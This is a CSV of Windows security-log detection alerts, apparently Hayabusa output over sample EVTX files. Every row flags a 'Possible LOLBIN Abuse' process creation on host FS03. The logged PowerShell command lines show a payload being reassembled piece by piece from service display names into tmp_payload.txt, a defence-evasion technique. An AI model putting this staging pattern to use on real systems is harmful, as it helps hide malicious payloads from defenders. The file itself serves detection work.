2021-11-03 17:36:37.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:42.211 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:42.227 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:48.052 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:48.067 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:55.301 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:55.317 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:56.773 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:56.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:02.569 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:02.585 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
